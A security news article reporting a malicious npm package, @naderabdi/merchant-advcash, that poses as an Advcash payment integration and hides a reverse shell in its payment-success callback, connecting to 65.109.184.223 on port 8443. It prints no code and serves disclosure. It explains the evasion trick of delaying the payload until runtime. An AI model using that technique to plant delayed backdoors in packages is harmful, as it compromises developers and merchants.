Ddos 
A malicious npm package, disguised as a merchant integration for the Advcash payment platform, has been discovered to contain a reverse shell that triggers upon a successful payment transaction.
The Socket Threat Research team uncovered the package, @naderabdi/merchant-advcash, which implements functions for creating payment orders, validating requests, and updating transaction statuses. The report states that “The open source package quietly bundles a reverse shell inside a payment success callback”.
Advcash, described as “a lesser-known digital payment platform often used in gray-market crypto exchanges, offshore financial services, and certain high-risk e-commerce operations,” adds a layer of credibility to the malicious package. The report highlights that “While Advcash isn’t a household name like PayPal or Stripe, it occupies a distinct niche in the payments landscape, one that makes it a tempting disguise for attackers seeking plausible cover”.
The malicious package includes legitimate-looking business logic, such as hashing payment data and validating credentials, to further deceive developers. However, the key threat lies within the url_success() method, where a reverse shell is embedded to execute after a successful transaction. As the report emphasizes, “That moment where a payment has been completed and everything seems secure is precisely when the attacker seizes control”.
This reverse shell connects to a remote server (65.109.184.223) over TCP port 8443, granting the attacker remote control over the victim’s system. Unlike many malicious packages that execute code during installation, this payload is delayed until runtime, specifically after a successful transaction, making it more evasive.
The report also notes the sophistication of the disguise:
- “The package implements real business logic: hashing payment data, validating credentials, and mimicking a legitimate payment processing flow”.
- “The reverse shell is not a standalone file or script. It is embedded inside a method meant to handle payment success callbacks”.
- “The inclusion of realistic features, such as SHA-256 hashing, input validation, and merchant configuration, gives the package credibility, increasing the likelihood it would be adopted without suspicion”.
The discovery of this malicious package raises concerns about the potential for targeted attacks on merchants using Advcash or the broader use of malware-as-a-service within smaller payment ecosystems. The report concludes with a warning: “Even packages that appear purpose-built for e-commerce or payments can be Trojan horses for deeper compromises”.
Related Posts:
About The Author
